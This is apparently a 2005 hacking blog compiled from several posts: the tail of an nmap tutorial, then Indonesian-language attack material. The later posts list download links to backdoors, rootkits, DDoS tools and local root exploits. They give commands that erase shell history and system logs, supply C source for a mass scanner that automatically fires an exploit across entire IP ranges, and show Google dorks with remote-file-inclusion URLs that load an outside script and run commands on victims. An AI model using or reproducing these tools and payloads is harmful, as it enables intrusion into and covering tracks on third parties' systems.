[Classification: Potentially Bad Traffic] [Priority: 2]
07/22-13:37:26.450097 192.168.0.4 -> 192.168.0.3
TCP TTL:225 TOS:0x0 ID:57511 IpLen:20 DgmLen:36 MF
Frag Offset: 0x0 Frag Size: 0x10

[**] [1:522:1] MISC Tiny Fragments [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
07/22-13:37:26.450101 192.168.0.4 -> 192.168.0.3
TCP TTL:225 TOS:0x0 ID:50069 IpLen:20 DgmLen:36 MF
Frag Offset: 0x0 Frag Size: 0x10

Fragscan only works with ACK, FIN, Maimon, NULL, SYN, Window, and XMAS scan types

-O OS fingerprinting

The -O flag tells nmap to try and calculate what operating system is running. This is one of most useful techniques nmap has to offer. Nmap uses TCP stack fingerprinting, it then compares it's results to a database from that database it can then determine what operating system the host is running. TCP fingerprinting is only one method to determine what OS a specific host is running but this lesson is on nmap so we will discuss TCP fingerprinting. The reason this is possible is every OS has a different implementation of the TCP stack, a windows machine will have different IPID's, sequence numbers and timing than a Linux or BSD machine. Because this involves analyzing the TCP stack you can also source other information from the TCP stack, for example how predictable it's IPID's are, weather or not it's incremental or positive increments, if you find a machine has a incremental stack it might be possible to guess it's responses and spoof a connection. Hackers use OS fingerprinting and database entire networks, and when a new exploit is released they just search through there logs for target that matches the exploit criteria.

[root@REDHATBOX root]# nmap -O -sS 192.168.0.1

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 09:16 EST
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
Interesting ports on 192.168.0.1:
(The 1639 ports scanned but not shown below are in state: filtered)
Port State Service
135/tcp open loc-srv
1002/tcp open unknown
1025/tcp open NFS-or-IIS
1720/tcp open H.323/Q.931
5000/tcp open UPnP
Device type: general purpose
Running: Microsoft Windows NT/2K/XP
OS details: Microsoft Windows XP Professional RC1+ through final release

Nmap run completed -- 1 IP address (1 host up) scanned in 87.142 seconds

Nmap successfully identified the operating system as Windows XP Professional, this is valuable information to hackers and pen-testers. Now you can configure your pen- test to target a Windows system.

[root@REDHATBOX root]# nmap -O -sS 192.168.0.4
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 09:24 EST
Interesting ports on 192.168.0.4:
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux Kernel 2.4.0 - 2.5.20
Uptime 16.176 days (since Tue Jul 8 05:11:43 2003)

Nmap run completed -- 1 IP address (1 host up) scanned in 16.112 seconds
In this test we get what kernel is running and this lets us know it is linux.

To get the TCP sequence prediction and IPID you need to include -v (verbose) flag you can even use -vv for even more output from nmap.

[root@REDHATBOX root]# nmap -v -O -sS 192.168.0.4
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 11:45 EST
Host 192.168.0.4 appears to be up ... good.
Initiating SYN Stealth Scan against 192.168.0.4 at 11:45
Adding open port 6000/tcp
Adding open port 139/tcp
Adding open port 21/tcp
Adding open port 1024/tcp
Adding open port 111/tcp
Adding open port 23/tcp
Adding open port 22/tcp
The SYN Stealth Scan took 2 seconds to scan 1644 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Interesting ports on 192.168.0.4:
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux Kernel 2.4.0 - 2.5.20
Uptime 16.274 days (since Tue Jul 8 05:11:43 2003)
TCP Sequence Prediction: Class=random positive increments
Difficulty=2621869 (Good luck!)
IPID Sequence Generation: All zeros

Nmap run completed -- 1 IP address (1 host up) scanned in 14.787 seconds

Here is the difference in the TCP stack, below is a Windows XP pro machine, it's difficulty is allot easer and is incremental, meaning in theory it is possible to try a TCP sequence attack.

[root@REDHATBOX root]# nmap -v -O -sS 192.168.0.1
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 11:50 EST
Host 192.168.0.1 appears to be up ... good.
Initiating SYN Stealth Scan against 192.168.0.1 at 11:50
Adding open port 135/tcp
Adding open port 5000/tcp
Adding open port 1002/tcp
Adding open port 1025/tcp
Adding open port 1720/tcp
adjust_timeout: packet supposedly had rtt of 9020013 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 9021101 microseconds. Ignoring time.
The SYN Stealth Scan took 71 seconds to scan 1644 ports.
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
For OSScan assuming that port 135 is open and port 38216 is closed and neither are firewalled
Interesting ports on 192.168.0.1:
(The 1639 ports scanned but not shown below are in state: filtered)
Port State Service
135/tcp open loc-srv
1002/tcp open unknown
1025/tcp open NFS-or-IIS
1720/tcp open H.323/Q.931
5000/tcp open UPnP
Device type: general purpose
Running: Microsoft Windows NT/2K/XP
OS details: Microsoft Windows XP Professional RC1+ through final release
TCP Sequence Prediction: Class=random positive increments
Difficulty=23841 (Worthy challenge)
IPID Sequence Generation: Incremental

Nmap run completed -- 1 IP address (1 host up) scanned in 85.411 seconds

-iR randomize hosts

I like this option, i think of it as trawling. Nmap just picks random hosts and scans them. It's not as direct as scanning subnets but you can discover some cool networks. And thats what nmap is all about, discovering networks.

Host 217.227.180.44 appears to be down, skipping it.
Host 183.221.113.67 appears to be down, skipping it.
Host 210.143.252.40 appears to be down, skipping it.
Host 49.233.209.60 appears to be down, skipping it.
Host 188.131.254.141 appears to be down, skipping it.ng it.
Host 190.52.101.229 appears to be down, skipping it.
If you look at the above address you can see how nmap just randomly picks hosts and scans them. If you wanted you could do this forever on youre networks. Everytime the connection drops out just do --resume (logfile). And run it as a background process.

There is another way to randomize nmap scans with the --randomize_hosts

-iL read targets from file.

If you have youre networks or Wlan mapped out into a file, give nmap the -iL flag and it will read host names from that file and begin scanning them.

-F Fast scan

Only scans for know services, instead of scanning all 65535 it only scans 1190 and decreases scan times greatly.

-p Specify Ports

Even better if you are scanning for rouge web servers or something you only have to scan for ports 80,443. You can specify the ports like so.

[root@REDHATBOX root]# nmap -p 22,21 -sT 192.168.0.4

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 12:09 EST
Interesting ports on 192.168.0.4:
Port State Service
21/tcp open ftp
22/tcp open ssh

Nmap run completed -- 1 IP address (1 host up) scanned in 10.252 seconds

Here we just scanned for ssh and ftp. For more options you can try 21,22,80-200

[root@REDHATBOX root]# nmap -p 21,22,80-200 -sT 192.168.0.4
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 12:11 EST
Interesting ports on 192.168.0.4:
(The 119 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
111/tcp open sunrpc
139/tcp open netbios-ssn

Nmap run completed -- 1 IP address (1 host up) scanned in 8.128 seconds

So we scanned for ftp,ssh and every open port from 80-200.

Nmap scan logs.

You can log nmap scans in 4 different formats.

-oN logs nmap scans in human readable format.
-oX logs nmap scans in XML format.
-oG logs nmap scans in grepable format
-oS logs nmap scans in script kiddie format.
-oA logs nmap scans in all of the above formats except script kiddie.

here is the script kiddie log format. Not recommended.

[root@REDHATBOX test]# cat kiddie

StartIng nmap 3.30 ( HttP://www.|ns3cUre.0rg/nmAp/ ) At 2003-07-24 13:39 e$T
!nt3R3$t|ng pOrTz 0n 192.168.0.4:
(TH3 1637 Portz $canN3d but n0t $hOwn b3l0w ArE iN $TAt3: cl0s3d)
P0rT $tate s3rVIcE
21/tcp 0p3n ftp
22/tcp oP3N $$h
23/Tcp Open t3lnEt
111/tcp 0p3n sunrpc
139/tcp 0pEn n3tbioz-$$n
1024/tCp opEn kdm
6000/tcP op3n X11

nmap run c0mpl3ted -- 1 |P adDr3sz (1 h0St up) scannEd |n 8.570 $3conDs

this is my preferred logging method with nmap.

[root@REDHATBOX test]# nmap -oA test -sT 192.168.0.4;ls

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 14:43 EST
Interesting ports on 192.168.0.4:
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in 7.713 seconds
kiddie test.gnmap test.nmap test.xml

resume your scan by specifying the following flag in nmap --resume logfile.

Nmapfe Nmap front end.

The nmap front end is a gui version of the nmap scanner for *nix variants.

Nmap for windows

We have focused the major part of this lesson on nmap for linux, but there is a windows version that is capable of the same functionality as the linux version. The windows version is allot slower than the linux version but apart from that it is very capable.

tools hacking

2005-02-25T20:02:00.000+07:00

from my friends

toolss

http://www.gohanz.com/tools.htm
http://brutalside.host.sk/
http://www.gohanz.com/tutor.htm
http://brutalside.host.sk/tools/ftp.tgz
http://brutalside.host.sk/tools/lame.tgz
http://brutalside.host.sk/tools/massplo.tar.gz
http://brutalside.host.sk/tools/massplor.tar.gz
http://brutalside.host.sk/tools/trinoo.tgz

This is my favorites backdoor
http://brutalside.host.sk/tools/tk8.tar.gz
http://www.geocities.com/brutalside/backdoor/tk8.tar.gz
http://brutalside.host.sk/tools/trojanit.tar.gz
http://www.geocities.com/brutalside/backdoor/trojanit.tar.gz
http://brutalside.host.sk/tools/shv4.tar.gz
http://www.geocities.com/brutalside/backdoor/shv4.tar.gz
http://brutalside.host.sk/tools/term

This is my misc tools
http://brutalside.host.sk/tools/psyBNC2%255B1%255D.2.1-linux-i86-static.tar.gz
http://brutalside.host.sk/tools/psybnc2.2.2.tar.gz
http://brutalside.host.sk/tools/kik

toolsss
http://brutalside.host.sk/tools/wget-1.5.1-1.i386.rpm
http://brutalside.host.sk/tools/gcc-3.0.4.tar.gz

This is for local exploit
http://brutalside.host.sk/tools/local.tar.gz
http://brutalside.host.sk/tools/local2.tar.gz

COBALT LOCAL EXPLOIT :: aucobalt60.sh :: [ usage : sh aucobalt60.sh ]
http://brutalside.host.sk/tools/aucobalt60.sh

This is for removing logs

write this for remove the history : export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0

Write this for remove all logs : rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r

---------

http://www.gohanz.com/putty.exe
http://www.gohanz.com/msamba.tar.gz
http://www.gohanz.com/shv4.tar.gz
http://www.gohanz.com/Luckroot.tar
http://www.gohanz.com/xpost.tgz
http://www.gohanz.com/grabbb-0.1.0.tar.gz
http://www.gohanz.com/udpflood.zip
http://www.gohanz.com/iisscan.zip
http://www.gohanz.com/port.tcl
http://www.gohanz.com/bind
http://www.gohanz.com/massplo.tar.gz
http://www.gohanz.com/psyBNC2.3.tar.gz

scanner hacking gabungan

2005-02-25T20:01:00.000+07:00

/*********************************************************
* Mass Scanner menggunakan gabungan
* beberapa tool dan satu exploit
*
* oleh : iko (iko94@yahoo.com)
* release : dec,15,200*
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/

Masih ingat dengan artikel berjudul "Menggunakan Mass Scanner Dengan Telnet
Fingerprint Metode Shell Scripting" (milik mas scut di indohack.sf.net) ?
Artikel tersebut menerangkan tentang bagaimana cara mencoba satu exploit ke banyak
target sasaran yang berupa daftar di satu file. Mass Scanner Telnet Fingerprint itu
mempunyai satu kelemahan yaitu kita harus sudah membuat satu daftar nomor ip yang
akan di-scan.
Nah, bagaimana caranya agar kita tinggal mengetikkan satu baris perintah saja dan
semuanya akan berjalan dengan sendirinya ?
Berikut ini akan penulis jelaskan caranya, beserta tools yang diperlukan.
Tools:
1. mass.c (dicomot dari massplo.tar.gz milik mas slamet, source code di bawah)
2. mig-port-scan.c (milik no1 => greyhats.za.net , source code ada di bawah)
3. sebuah script sederhana (try.sh)
4. sebuah file log temporer
5. sebuah exploit
6. banyak kesabaran :)
Pertama-tama tentukan satu exploit yang akan dipakai (contoh : explo.c), kemudian
compile file tersebut (catatan : anda harus memahami betul bagaimana cara kerja
exploit tersebut). Langkah ke dua, compile file mig-port-scan.c . Langkah ke tiga,
buatlah satu script sederhana, yang akan kita gunakan untuk melakukan pengecekan
server target mana yang mempunyai port yang terbuka sesuai dengan kebutuhan exploit
kita, jika benar terbuka, maka exploit akan dijalankan dan melakukan penetrasi ke
server target.
Contoh script sederhana ini :
-----------try.sh start here--------------
#!/bin/sh
#
./mig-port-scan -h $1 -p port_yg_discan -o log_temporer
sleep 1
cat log_temporer
CEK="`cat log_temporer | awk '{print $2}'`"
if [ "$CEK" = "Open" ]; then
echo "OK server $1 terbuka, kita coba..."
./exploit -t $1
fi
echo "kita coba yang lain..... :("
-----------try.sh end here-----------------
Simpan dan chmod +x try.sh ini.
Perhatikan bahwa argumen $1 di atas mewakili nomor ip target kita, sedang sleep 1
detik digunakan untuk menanti konek back dari mig-port-scan (yaitu hasil scan).
Perhatikan juga tanda baca backquote (jangan sampai salah lho !) di variable CEK.
Anda juga harus mengganti baris ./exploit -t $1 , dengan perintah untuk menjalankan
exploit anda (dengan segala argumen-nya tentu!).
Ada dua keuntungan pemakaian try.sh ini, yaitu jika terjadi kondisi :
1. ketika exploit kita mandeg di tengah jalan (seperti stagnant/nyantol);
2. ketika kita sudah berhasil masuk ke suatu server target, dan kita ingin
meneruskan proses scanning kita;
maka kita tinggal memencet tombol control+c, dan proses pun akan terus berjalan,
karena yang ditutup adalah program script ini dan bukan program mass.
Nah, kita tinggal mengedit program utama, yaitu mass.c
Perhatikan source mass.c di baris perintah berikut:
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
nah di situlah letak script kita tadi, baris tersebut menjalankan script kita
dengan cara memberikannya ke variabel luck (lihat baris system(luck);). Masih
tertarik ? Makanya segera belajarlah bahasa pemrograman !!!
Langkah terakhir, kita harus mengkompile mass.c agar bisa kita jalankan.
#gcc mass.c -o massexploit -Wall
lalu jalankan mass scanner kita :
#./massexploit
ikuti petunjuknya !
Selamat mencoba !!!

Berikut ini source code mass.c:
-----------------mass.c begin here-------------------------
#include
#include
#include
#include
#include
#include
#include
#include

#define MAX_SOCKETS 500
#define TIMEOUT 5

#define S_NONE 0
#define S_CONNECTING 1

struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS];

void init_sockets(void);
void check_sockets(void);
void fatal(char *);

int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];

if (argc < 3) {
printf("Usage: %s [b-block] [c-block]\n", argv[0]);
return -1;
}

done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;

aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("Invalid a-range\n");
}

port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("Bad port number.\n");

if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("Invalid b-range.\n");
}

if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("Invalid c-range.\n");
}

init_sockets();

scantime = time(0);

while(!done) {
for (i = 0; i < MAX_SOCKETS; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < MAX_SOCKETS; k++) {
if (connlist[k].status > S_NONE)
ns++;
}

if (ns == 0)
break;
}

}
}
}

if (connlist[i].status == S_NONE) {
connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
if (ret == -1) {
printf("Unable to set O_NONBLOCK\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("Invalid IP.");
connlist[i].addr.sin_family = AF_INET;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = S_CONNECTING;
dd++;
}
}
}
}

check_sockets();
}

}

void init_sockets(void)
{
int i;

for (i = 0; i < MAX_SOCKETS; i++) {
connlist[i].status = S_NONE;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}

void check_sockets(void)
{
int i, ret;

for (i = 0; i < MAX_SOCKETS; i++) {
if ((connlist[i].a < (time(0) - TIMEOUT)) &&
(connlist[i].status == S_CONNECTING)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}

else if (connlist[i].status == S_CONNECTING) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == EISCONN) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = S_NONE;
}

if ((errno != EALREADY) && (errno != EINPROGRESS)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
else {
char luck[100];
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("Sodok ip %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("Wuasuu, cuk...\n");
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
}
}

void fatal(char *err)
{
int i;
printf("Error: %s\n", err);
for (i = 0; i < MAX_SOCKETS; i++) {
if (connlist[i].status >= S_CONNECTING)
close(connlist[i].s);
}
exit(-1);
}
---------------mass.c end here--------------------------------------

Berikut source code mig-port-scan.c
---------------mig-port-scan.c start here---------------------------
/****************
name : mig-port-scan.c

version : 1.0

creation date : 15th of October 2002

author : no1 ( greyhats.za.net )

description : veeery fast connect() port scanner
with multi-host scanning support

usage : gcc mig-port-scan.c -o mig-port-scan -Wall
./mig-port-scan

extra : nmap is just too slow for simple connect()
scans of big IP lists thats why i coded this.
if you have any comments or suggestions, mail
me at no1@greyhats.za.net or msg me at
http://greyhats.za.net/guestbook/
****************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v);
int get_port(char *ports, char *backup);
int Connect(int fd, char *ip, int port, int time_out, int debug);
int usage(char *arg);
long hosts_scanned = 0;
long ports_scanned = 12;
int main(int argc, char **argv)
{
int TIMEOUT = 3;
int CHILDREN = 50;
int PORT = 0;
int DEBUG = 0;
int i = 0;
int p = 0;
int log_check = 0;
int flag = 0;
int status;
int verbose = 0;
FILE *fp;
FILE *ld;
char IP[16] = "127.0.0.1";
char INPUT[256] = "./input318";
char OUTPUT[256] = "./log";
char PORTS[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char PORTS_BACKUP[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char *P_PORTS;
char *P_PORTS_BACKUP;
char opt;
P_PORTS = PORTS;
P_PORTS_BACKUP = PORTS_BACKUP;
while((opt = getopt(argc, argv, "h:i:p:o:c:t:vd")) != -1)
{
switch (opt)
{
case 'h':// ip
{
flag++;
bzero(IP, sizeof(IP));
strcpy(IP, optarg);
remove("./input318");
fp = fopen(INPUT, "w");
fprintf(fp, "%s\n", IP);
fclose(fp);
fp = fopen(INPUT, "r");
break;
}
case 'i':// file with ips
{
flag++;
bzero(INPUT, sizeof(INPUT));
strcpy(INPUT, optarg);
fp = fopen(INPUT, "r");
break;
}
case 'p':// ports in 21,22,23 format
{
bzero(PORTS, sizeof(PORTS));
bzero(PORTS_BACKUP, sizeof(PORTS_BACKUP));
strcpy(PORTS, optarg);
strcpy(PORTS_BACKUP, optarg);
strcat(PORTS, ",:");
strcat(PORTS_BACKUP, ",:");
puts("TEST");
ports_scanned = 0;
for(; PORTS[p] != 0; p++)
{
if(PORTS[p] == 44)
ports_scanned++;
}
break;
}
case 'o':// log file (stdout if not used)
{
log_check = 1;
strcpy(OUTPUT, optarg);
ld = fopen(OUTPUT, "w");
break;
}
case 'c':// number of children
{
CHILDREN = atoi(optarg);
break;
}
case 't':// timeout value for connect/read/write
{
TIMEOUT = atoi(optarg);
break;
}
case 'v':// verbose mode
{
verbose++;
break;
}
case 'd':// debuging output
{
DEBUG = 1;
break;
}
}
}
if((flag == 2) || (flag == 0))
{
usage(argv[0]);
exit(1);
}
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
hosts_scanned++;
}
fclose(fp);
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n\n");
printf("Hosts being scanned: %ld\n", hosts_scanned);
printf("Ports being scanned: %ld\n\n", ports_scanned);
bzero(IP, sizeof(IP));
fp = fopen(INPUT, "r");
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
IP[strlen(IP) - 1] = '\0';
for(; (PORT = get_port(P_PORTS, P_PORTS_BACKUP)) != 0; i++)
{
switch (fork())
{
case 0:
{
scan(IP, PORT, TIMEOUT, DEBUG, &ld, log_check, verbose);
_exit(0);
break;
}
case -1:
{
perror("fork error");
_exit(0);
break;
}
default:
{
if(i > CHILDREN - 2)
{
wait(&status);
i--;
}
break;
}
}
}
bzero(IP, sizeof(IP));
}
remove("./input318");
fclose(fp);
return 0;
}
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v)
{
FILE *logs = *log;
int sockfd;
int stat;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket() error\n", ip, port);
return (-1);
}
stat = Connect(sockfd, ip, port, time_out, debug);
if(stat == -1)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
if(stat == -2)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
else
{
if(logcheck == 1)
{
fprintf(logs, "[%s][%d] Open\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
fprintf(stdout, "[%s][%d] Open\n", ip, port);
fflush(stdout);
close(sockfd);
}
}
return (0);
}
int get_port(char *ports, char *backup)
{
int i;
int x;
int z;
char port[5];
char tmp[256];
bzero(port, sizeof(port));
bzero(tmp, sizeof(tmp));
strcpy(tmp, ports);
for(i = 0; ports[i] != ','; i++)
{
if(ports[i] == ':')
{
strcpy(ports, backup);
return 0;
}
port[i] = ports[i];
}
port[strlen(port)] = '\0';
for(z = strlen(port) + 1, x = 0; z < strlen(ports); z++)
{
ports[x++] = tmp[z];
}
ports[x] = '\0';
return atoi(port);
}
int Connect(int fd, char *ip, int port, int time_out, int debug)
{
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
int getsockopt_length = 0;
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error getting socket flags\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket non-blocking\n", ip, port);
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0)
{
if(errno != EINPROGRESS)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() error\n", ip, port);
close(fd);
return (-1);
}
}
else
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() timed out\n", ip, port);
close(fd);
return (-2);
}
if(select_status == -1)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> select() error on connect()\n", ip, port);
close(fd);
return (-1);
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write))
{
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
{
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0)
{
errno = ETIMEDOUT;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() timed out on connect()\n", ip, port);
close(fd);
return (-1);
}
if(getsockopt_error == 0)
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
else
{
errno = getsockopt_error;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() error on connect()\n", ip, port);
close(fd);
return (-1);
}
}
}
else
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket not readable or writable\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
int usage(char *arg)
{
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n");
printf("\n%s [[-h ] | [-i ]] [-o ] [-p <#>] [-c <#>] [-t <#>] [-v] [-d]\n", arg);
printf("\n [-h]\tsingle ip address to scan\n");
printf(" [-i]\tfile with ip addresses to scan\n");
printf(" [-o]\tlog file (defult: stdout)\n");
printf(" [-p]\tports seperated by commas\n");
printf("\t(default: 21,22,23,25,53,80,110,111,113,119,143,515)\n");
printf(" [-c]\tnumber of children to spawn (default: 50)\n");
printf(" [-t]\tconnect timeout value (default: 3)\n");
printf(" [-v]\tfor verbose output (default: off)\n");
printf(" [-d]\tfor debuging output (default: off)\n\n");
return 0;
}
/*******************/
// greyhats.za.net //
/*******************/

--------------mig-port-scan.c end here---------------------------

iko berterimakasih kepada:
[+] qq
[+] tiyok
[+] keputih group
[+] everyone who shouting the freedom

iko tidak berterimakasih kepada:
[-] monopoli
[-] birokrasi
[-] para penjilat
[-] koruptor
[-] closed source

TRIK 9 HACKING

2005-02-25T19:59:00.000+07:00

===========
Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
--------------------------------------------------------------------------------------------------------
Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)

1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".
keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".
